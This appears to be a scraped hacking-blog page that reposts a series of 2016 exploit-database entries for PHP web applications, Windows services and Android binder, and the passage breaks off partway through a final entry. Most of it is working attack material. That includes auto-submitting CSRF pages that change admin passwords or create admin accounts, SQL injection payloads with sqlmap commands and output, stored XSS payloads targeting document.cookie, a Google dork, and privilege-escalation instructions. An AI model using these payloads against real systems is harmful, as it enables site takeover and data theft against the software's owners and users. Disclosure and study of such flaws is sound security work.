<!--
=====================================================
# Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# Exploit:
-->
<html>
<!-- CSRF PoC -->
<body>
<form action="http://localhost/blog/admin.php" method="POST">
<input type="hidden" name="act" value="addPost" />
<input type="hidden" name="act" value="updateOptionsAdmin" />
<input type="hidden" name="email" value="attacker@mail.com" />
<input type="hidden" name="captcha" value="nocap" /> <!--Set No
Captcha(unsecured)-->
<input type="hidden" name="captcha_theme" value="White theme" />
<input type="hidden" name="items_link"
value="http://localhost/demo_forum.php" />
<input type="hidden" name="time_zone" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
<!--
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
-->
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863110926
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
=====================================================
# Simple Forum PHP 2.4 - SQL Injection
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable Url:
http://localhost/forum/admin.php?act=replies&topic_id=[payload]
http://localhost/forum/admin.php?act=editTopic&id=[payload]
Vulnerable parameter : topic_id , id
Mehod : GET
A simple inject :
Payload : '+order+by+100--+
http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+
In response can see result :
Could not execute MySQL query: SELECT * FROM demo_forum_topics WHERE
id='' order by 100-- ' . Error: Unknown column '100' in 'order clause'
Result of payload: Error: Unknown column '100' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
# Exploit Title :----------------- : JonhCMS 4.5.1 - (go.php?id) - SQL Injection
# Author :------------------------ : Besim
# Google Dork :---------------- : -
# Date :-------------------------- : 14/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Vendor Homepage :------- : -
# Software link : -------------- : http://wmscripti.com/php-scriptler/johncms-icerik-yonetim-scripti.html
############ SQL INJECTION Vulnerabilty ##############
-*-*- : Vulnerable code----------: $req = mysql_query("SELECT * FROM `cms_ads` WHERE `id` = '$id'");
-*-*- : Vulnerable parameter--: $id
-*-*- : Vulnerable file------------: http://site_name/path/go.php?id=[SQL injection code]
# Exploit Title: RSS News AutoPilot Script - Admin Panel Authentication Bypass
# Date: 14 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Software Link: https://codecanyon.net/item/rss-news-autopilot-script/11812898
# Version: 1.0.1 to 3.1.0
-------------------------------------------------------------------------------
Description:
An Attackers are able to completely takeover the web application using RSS News - AutoPilot Script as they can gain access to the admin panel and manage the website as an admin.
Steps to Reproduce:
Step 1: Add: http://victim-site.com/admin/login.php in a rule list on No-Redirect Extension.
Step 2: Access: http://victim-site.com/admin/index.php
Step 3: Bypassed.
PoC Video: https://www.youtube.com/watch?v=jldF-IPgkds
Impact: Unauthenticated attackers are able to gain full access to the administrator panel and thus have total control over the web application.
Fix/Patch: Make use of PHP exit() or die() function. / Update to latest version.
#########################################################################
# Exploit Title: Hotspot Shield Unquoted Service Path Privilege Escalation
# Date: 13/10/2016
# Author: Amir.ght
# Vendor Homepage: https://www.hotspotshield.com
# Software Link: https://www.hotspotshield.com/download/
# version : 6.0.3 (Latest)
# Tested on: Windows 7
##########################################################################
Hotspot Shield installs as a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc hshld
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: hshld
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Hotspot Shield\bin\cmw_srv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Hotspot Shield Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title :----------- : Colorful Blog - Cross-Site Request Forgery (Change Admin Pass)
# Author :------------------ : Besim
# Google Dork :---------- : -
# Date :--------------------- : 13/10/2016
# Type :--------------------- : webapps
# Platform :---------------- : PHP
# Vendor Homepage :-- : -
# Software link :---------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html
Description :
You can change admin's password with CSRF, if you know admin's username
########################### CSRF PoC ###############################
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/yonetim/admin.php" method="POST">
<input type="hidden" name="username" value="admin_username" />
<input type="hidden" name="password" value="besim" />
<input type="hidden" name="gonder" value="Kaydet" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
####################################################################
#########################################################################
# Exploit Title: IObit Malware Fighter Unquoted Service Path Privilege
Escalation
# Date: 12/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.iobit.com/en/index.php
# Software Link:
http://www.iobit.com/downloadcenter.php?product=malware-fighter-free
#version : 4.3.1 (Latest)
# Tested on: Windows 7
##########################################################################
IObit Malware Fighter installs two service with an unquoted service path
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
-------------------------------------------
C:\>sc qc IMFservice
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IMFservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\IObit\IObit Malware
Fighter\IMFsrv.exe
LOAD_ORDER_GROUP : System Reserved
TAG : 1
DISPLAY_NAME : IMF Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
-----------------------------------------
C:\>sc qc LiveUpdateSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: LiveUpdateSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : LiveUpdate
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title : ----------- : Colorful Blog - Stored Cross Site Scripting
# Author : ----------------- : Besim
# Google Dork : --------- : -
# Date : -------------------- : 13/10/2016
# Type : -------------------- : webapps
# Platform : --------------- : PHP
# Vendor Homepage :-- : -
# Software link : --------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html
Description :
# Vulnerable link : http://site_name/path/single.php?kat=kat&url='post_name'
*-*-*-*-*-*-*-*-* Stored XSS Payload *-*-*-*-*-*-*-*-*
*-* Vulnerable URL : http://site_name/path/single.php?kat=kat&url='post_name' --- Post comment section
*-* Vuln. Parameter : adsoyad
*-* POST DATA : adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post
# Exploit Title: VOX Music Player 2.8.8 '.pls' Local Crash PoC
# Date: 10-12-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://coppertino.com/vox/mac/
# Software Link: http://dl.devmate.com/com.coppertino.Vox/Vox.dmg
# Version: 2.8.8
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
import os
evil = '\x90'
pls = '[playlist]\n' + 'NumberOfEntries=1\n' +'File1' + evil + '\n' + 'Title1=\n' + 'Length1=-1\n'
file = open('Local_Crash_PoC.pls', 'wb')
file.write(pls)
file.close()
# Exploit Title: ATKGFNEXSrv ATKGFNEX- Privilege Escalation Unquoted Service Path vulnerability
# Date: 13/10/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: www.asus.com
# Version: 1.0.11.1
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
The application suffers from an unquoted service path issue impacting the service 'ATKGFNEXSrv (GFNEXSrv.exe)' deployed as part of ATKGFNEX
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.
POC :
C:\Users\Utilisateur>sc qc "ATKGFNEXSrv"
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: ATKGFNEXSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
LOAD_ORDER_GROUP : ShellSvcGroup
TAG : 0
DISPLAY_NAME : ATKGFNEX Service
DEPENDENCIES : ASMMAP64
SERVICE_START_NAME : LocalSystem
Additional notes :
https://hackerone.com/blog/asus-vulnerability-disclosure-deja-vu
# Exploit Title: InsOnSrv Asus InstantOn- Privilege Escalation Unquoted Service Path vulnerability
# Date: 13/10/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: www.asus.com
# Version: 2.3.1.1
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
The application suffers from an unquoted service path issue impacting the service 'ASUS InstantOn (InsOnSrv.exe)' deployed as part of Asus InstantOn
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.
POC :
C:\Users\Utilisateur>sc qc "ASUS InstantOn"
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: ASUS InstantOn
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\ASUS InstantOn\InsOnSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ASUS InstantOn Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Additional notes :
https://hackerone.com/blog/asus-vulnerability-disclosure-deja-vu
# Exploit Title :----------------- : Thatware 0.4.6 - (friend.php) - SQL Injection
# Author :------------------------ : Besim
# Google Dork :---------------- : -
# Date :-------------------------- : 13/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Vendor Homepage :------- : -
# Software link : -------------- : https://www.exploit-db.com/apps/13132b3e0eaeffc3fad55fded9e5bdc6-thatware_0.4.6.tar.gz
############################ SQL INJECTION Vulnerabilty ############################
*-* Code *-*
include ("header.php");
$result=mysql_query("select title from stories where sid=$sid")
*-* Vulnerable parameter-: $sid
*-* File-----------------: friend.php?sid=(SQL inj)
----------------------------------------------------------------------------------------------------------
# Exploit Title: ASLDRService ATK Hotkey- Privilege Escalation Unquoted Service Path
# Date: 13/10/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: www.asus.com
# Version: 1.0.69.0
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
The application suffers from an unquoted service path issue impacting the service 'ASLDRService' deployed as part of ATK Hotkey
This could potentially allow an authorized but non-privileged local user to execute arbitrary code witystem privileges on the system.
POC :
C:\Users\Utilisateur>sc qc ASLDRService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: ASLDRService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ASLDRSrv.exe
LOAD_ORDER_GROUP : ShellSvcGroup
TAG : 0
DISPLAY_NAME : ASLDR Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Additional notes :
https://hackerone.com/blog/asus-vulnerability-disclosure-deja-vu
=====================================================
# Simple Blog PHP 2.0 - SQL Injection
=====================================================
# Vendor Homepage: http://simpleblogphp.com/
# Date: 13 Oct 2016
# Demo Link : http://simpleblogphp.com/blog/admin.php
# Version : 2.0
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# SQL Injection
This vulnerability is in admin.php file when we want to edit a post or
edit a categorie and..., with id parameter can show sql injection.
#PoC:
Vulnerable Url:
http://localhost/blog/admin.php?act=editPost&id=[payload]
http://localhost/blog/admin.php?act=editCat&id=[payload]
http://localhost/blog/admin.php?act=editComment&id=[payload]
http://localhost/blog/admin.php?act=comments&post_id=[payload]
Vulnerable parameter : id
Mehod : GET
A simple inject :
Payload : '+order+by+999--+
http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+
In response can see result :
Could not execute MySQL query: SELECT * FROM blog_posts WHERE id=''
order by 999-- ' . Error: Unknown column '999' in 'order clause'
Result of payload: Error: Unknown column '999' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
=====================================================
# Simple Blog PHP 2.0 - CSRF(Add Post) // Stored XSS
=====================================================
# Vendor Homepage: http://simpleblogphp.com/
# Date: 13 Oct 2016
# Demo Link : http://simpleblogphp.com/blog/admin.php
# Version : 2.0
# Platform : PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# CSRF PoC(Add Post):
<html>
<!-- CSRF PoC -->
<body>
<form action="http://localhost/blog/admin.php" method="POST">
<input type="hidden" name="act" value="addPost" />
<input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
<input type="hidden" name="post_title" value="Hacked" />
<input type="hidden" name="post_text" value="Hacked" />
<input type="hidden" name="post_limit" value="550" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Stored XSS PoC:
<html>
<!-- CSRF + XSS Stored PoC -->
<body>
<form action="http://localhost/blog/admin.php" method="POST">
<input type="hidden" name="act" value="addPost" />
<input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
<input type="hidden" name="post_title" value="<script>alert('XssPoC')</script>" />
<input type="hidden" name="post_text" value="Hacked" />
<input type="hidden" name="post_limit" value="550" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
================================================================================
# Discovered By : Ehsan Hosseini
================================================================================
# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting
# Author :------------------------ : Besim
# Google Dork :---------------- : -
# Date :-------------------------- : 12/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Vendor Homepage :------- : http://www.apphp.com
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products
-*-*-*-*-*-*-*-*- Description -*-*-*-*-*-*-*-*-
*-* Vulnerable link : http://site_name/path/index.php?page=pages&pid=
*-* Stored XSS Payload ( Comments ):
# Vulnerable URL : http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
# Payload : <svg/onload=prompt(7);//>
############ POST DATA ############
task=publish_comment &
comment_id=
& article_id=13
&user_id=
&token=212529c97855409e56c0e333721461df
&comment_user_name=<svg/onload=prompt(document.cookie);//>
&comment_user_email=meryem@yopmai.com
&comment_text=skdLSJDLKSDKJ
&captcha_code=w7AG
&btnSubmitPC=Publish your comment
############ ########## ############
*-* Thanks Meryem AKDOĞAN *-*
# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin (Main))
# Author :------------------------ : Besim
# Google Dork :---------------- : -
# Date :-------------------------- : 12/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Vendor Homepage :------- : http://www.apphp.com
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products
*-* Vulnerable link : http://site_name/path/index.php?admin=admins_management
############ CSRF PoC #############
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/index.php?admin=admins_management" method="POST" enctype="multipart/form-data">
<input type="hidden" name="mg_prefix" value=" " />
<input type="hidden" name="mg_action" value="create" />
<input type="hidden" name="mg_rid" value="-1" />
<input type="hidden" name="mg_sorting_fields" value=" " />
<input type="hidden" name="mg_sorting_types" value=" " />
<input type="hidden" name="mg_page" value="1" />
<input type="hidden" name="mg_operation" value=" " />
<input type="hidden" name="mg_operation_type" value=" " />
<input type="hidden" name="mg_operation_field" value=" " />
<input type="hidden" name="mg_search_status" value=" " />
<input type="hidden" name="mg_language_id" value=" " />
<input type="hidden" name="mg_operation_code" value="yh0ox75feagwqbccp8ef" />
<input type="hidden" name="token" value="dbe0e51cf3a5ce407336a94f52043157" />
<input type="hidden" name="date_lastlogin" value=" " />
<input type="hidden" name="date_created" value="2016-10-12 21:14:06" />
<input type="hidden" name="first_name" value="meryem" />
<input type="hidden" name="last_name" value="ak" />
<input type="hidden" name="email" value="mmm@yopmail.com" />
<input type="hidden" name="user_name" value="meryem" />
<input type="hidden" name="password" value="meryem" />
<input type="hidden" name="account_type" value="admin" />
<input type="hidden" name="preferred_language" value="en" />
<input type="hidden" name="is_active" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
############ ########## ############
*-* Thanks Meryem AKDOĞAN *-*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=889
The interaction between the kernel /dev/binder and the usermode Parcel.cpp mean
that when a binder object is passed as BINDER_TYPE_BINDER or BINDER_TYPE_WEAK_BINDER,
a pointer to that object (in the server process) is leaked to the client process
as the cookie value. This leads to a leak of a heap address in many of the privileged
binder services, including system_server.
See attached PoC, which leaks the addresses of allocated heap objects in system_server.
Output running from the shell (run on droidfood userdebug build, MTC19X):
shell@bullhead:/ $ /data/local/tmp/binder_info_leak
--- binder info leak ---
[0] opening /dev/binder
[0] looking up activity
0000: 00 . 01 . 00 . 00 . 1a . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6f o 00 . 73 s 00 . 2e . 00 . 49 I 00 .
0032: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 4d M 00 .
0048: 61 a 00 . 6e n 00 . 61 a 00 . 67 g 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 .
0064: 08 . 00 . 00 . 00 . 61 a 00 . 63 c 00 . 74 t 00 . 69 i 00 . 76 v 00 . 69 i 00 .
0080: 74 t 00 . 79 y 00 . 00 . 00 . 00 . 00 .
BR_NOOP:
BR_TRANSACTION_COMPLETE:
BR_REPLY:
target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000
pid 0 uid 1000 data 24 offs 8
0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 01 . 00 . 00 . 00 . 55 U 00 . 00 . 00 .
0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
- type 73682a85 flags 0000017f ptr 0000005500000001 cookie 0000000000000000
[0] got handle 00000001
0000: 00 . 01 . 00 . 00 . 1c . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 61 a 00 . 70 p 00 . 70 p 00 . 2e . 00 .
0032: 49 I 00 . 41 A 00 . 63 c 00 . 74 t 00 . 69 i 00 . 76 v 00 . 69 i 00 . 74 t 00 .
0048: 79 y 00 . 4d M 00 . 61 a 00 . 6e n 00 . 61 a 00 . 67 g 00 . 65 e 00 . 72 r 00 .
0064: 00 . 00 . 00 . 00 . 05 . 00 . 00 . 00 . 70 p 00 . 77 w 00 . 6e n 00 . 65 e 00 .
0080: 64 d 00 . 00 . 00 .
BR_NOOP:
BR_TRANSACTION_COMPLETE:
BR_REPLY:
target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000
pid 0 uid 1000 data 28 offs 8
0000: 00 . 00 . 00 . 00 . 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 02 . 00 . 00 . 00 .
0016: 7f . 00 . 00 . 00 . c0 . 19 . 9d . 8b . 7f . 00 . 00 . 00 .
- type 73682a85 flags 0000017f ptr 0000007f00000002 cookie 0000007f8b9d19c0
[0] got handle 00000000
Debugger output from system_server
pwndbg> hexdump 0x0000007f8b9d19c0
+0000 0x7f8b9d19c0 38 35 76 ab 7f 00 00 00 00 00 00 00 00 00 00 00 |85v.|....|....|....|
+0010 0x7f8b9d19d0 65 00 6e 00 74 00 5f 00 40 d1 0c a8 7f 00 00 00 |e.n.|t._.|@...|....|
+0020 0x7f8b9d19e0 6a 16 20 00 00 00 00 00 20 ad 81 ab 7f 00 00 00 |j...|....|....|....|
+0030 0x7f8b9d19f0 e0 fc 7f 8e 7f 00 00 00 a0 f2 c7 8a 7f 00 00 00 |....|....|....|....|
+0040 0x7f8b9d1a00
This is pretty obviously the case; the code in Parcel.cpp that flattens binder objects
to pass via binder transactions:
status_t flatten_binder(const sp<ProcessState>& /*proc*/,
const sp<IBinder>& binder, Parcel* out)
{
flat_binder_object obj;
obj.flags = 0x7f | FLAT_BINDER_FLAG_ACCEPTS_FDS;
if (binder != NULL) {
IBinder *local = binder->localBinder();
if (!local) {
BpBinder *proxy = binder->remoteBinder();
if (proxy == NULL) {
ALOGE("null proxy");
}
const int32_t handle = proxy ? proxy->handle() : 0;
obj.type = BINDER_TYPE_HANDLE;
obj.binder = 0; /* Don't pass uninitialized stack data to a remote process */
obj.handle = handle;
obj.cookie = 0;
} else {
obj.type = BINDER_TYPE_BINDER;
obj.binder = reinterpret_cast<uintptr_t>(local->getWeakRefs());
obj.cookie = reinterpret_cast<uintptr_t>(local); // <--- is a pointer to the object
}
} else {
obj.type = BINDER_TYPE_BINDER;
obj.binder = 0;
obj.cookie = 0;
}
return finish_flatten_binder(binder, obj, out);
}
and the kernel code which processes this to send to the target process modifies
the fp->handle entry, overwriting fp->binder, but does not alter fp->cookie, which
contains the second pointer.
case BINDER_TYPE_BINDER:
case BINDER_TYPE_WEAK_BINDER: {
struct binder_ref *ref;
struct binder_node *node = binder_get_node(proc, fp->binder);
if (node == NULL) {
node = binder_new_node(proc, fp->binder, fp->cookie);
if (node == NULL) {
return_error = BR_FAILED_REPLY;
goto err_binder_new_node_failed;
}
node->min_priority = fp->flags & FLAT_BINDER_FLAG_PRIORITY_MASK;
node->accept_fds = !!(fp->flags & FLAT_BINDER_FLAG_ACCEPTS_FDS);
}
if (fp->cookie != node->cookie) {
binder_user_error("%d:%d sending u%016llx node %d, cookie mismatch %016llx != %016llx\n",
proc->pid, thread->pid,
(u64)fp->binder, node->debug_id,
(u64)fp->cookie, (u64)node->cookie);
goto err_binder_get_ref_for_node_failed;
}
if (security_binder_transfer_binder(proc->tsk, target_proc->tsk)) {
return_error = BR_FAILED_REPLY;
goto err_binder_get_ref_for_node_failed;
}
ref = binder_get_ref_for_node(target_proc, node);
if (ref == NULL) {
return_error = BR_FAILED_REPLY;
goto err_binder_get_ref_for_node_failed;
}
if (fp->type == BINDER_TYPE_BINDER)
fp->type = BINDER_TYPE_HANDLE;
else
fp->type = BINDER_TYPE_WEAK_HANDLE;
fp->handle = ref->desc;
binder_inc_ref(ref, fp->type == BINDER_TYPE_HANDLE,
&thread->todo);
trace_binder_transaction_node_to_ref(t, node, ref);
binder_debug(BINDER_DEBUG_TRANSACTION,
" node %d u%016llx -> ref %d desc %d\n",
node->debug_id, (u64)node->ptr,
ref->debug_id, ref->desc);
} break;
In the case of 64-bit processes, we also leak the high dword of the fp->binder pointer, because
a uint32_t is smaller than a binder_uintptr_t.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40515.zip
<!--
# Exploit Title : PHP Enter 4.2.7 - Cross-Site Request Forgery (Add New Post)
# Author : Besim
# Google Dork : -
# Date : 11/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.phpenter.net
# Software link : http://www.hotscripts.com/listings/jump/download/150217
########################### CSRF PoC ###############################
-->
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://site_name/path/addnews.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------4485886114928592041224662482");
xhr.withCredentials = true;
var body = "-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"univer\"\r\n" +
"\r\n" +
"2016074155\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"idblog\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"usercc\"\r\n" +
"\r\n" +
"root\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"editor\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"badress\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"bname\"\r\n" +
"\r\n" +
"Test\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"summary\"\r\n" +
"\r\n" +
"Test\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"main\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"amess\"\r\n" +
"\r\n" +
"\x3cp\x3eTestttt\x3c/p\x3e\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"query\"\r\n" +
"\r\n" +
"Submit\r\n" +
"-----------------------------4485886114928592041224662482--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
[x]========================================================================================================================================[x]
| Title : Advance MLM Script SQL Vulnerabilities
| Software : Advance MLM Script
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/advance-mlm-script/live_demo/236431
| Google Dork : news_detail.php?newid= © MLM SCRIPT
| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 199
| Description : MLM business upward day by day, Open Source MLM Script plays an important role for successful multilevel marketing business.
Our advanced featured PHP MLM Script enables MLM companies to manage and run their express selling business more effectively towards a successful way.
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/mlm/news_detail.php?newid=%Inject_Here%26
| Aadmin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : sqlmap -u "http://localhost/mlm/news_detail.php?newid=26" --invalid-string
[x]========================================================================================================================================[x]
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=26' AND 4440=4440 AND 'AJmz'='AJmz
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: newid=26' OR SLEEP(5) AND 'FokP'='FokP
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: newid=jMCtRq' UNION ALL SELECT NULL,CONCAT(0x71787a7a71,0x48755652787877617966627661486164744748424b6155564f514370537747504c6e736876665150,0x7178787171),NULL,NULL,NULL,NULL-- Afye
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]
######################
# Application Name : MLM Unilevel Plan Script v1.0.2
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Author Contact : https://twitter.com/byn4tural
# Vendor Homepage : http://www.i-netsolution.com/
# Vulnerable Type : SQL Injection
# Date : 2016-10-06
# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev
###################### SQL Injection Vulnerability ######################
# Location :
http://localhost/[path]/news_detail.php
######################
# PoC Exploit:
http://localhost/[path]/news_detail.php?newid=11%27%20%2F*%2130000and%20ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%20and*%2F%20%27x%27%3D%27x
# Exploit Code via sqlmap:
sqlmap -u http://localhost/[path]/news_detail.php?newid=11 --dbs
---
Parameter: newid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: newid=11' AND SLEEP(5) AND 'HheB'='HheB
---
[18:47:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
######################
[x]========================================================================================================================================[x]
| Title : B2B Portal Script Blind SQL Vulnerabilities
| Software : B2B Portal Script
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/b2b-portal-script/live_demo/190275
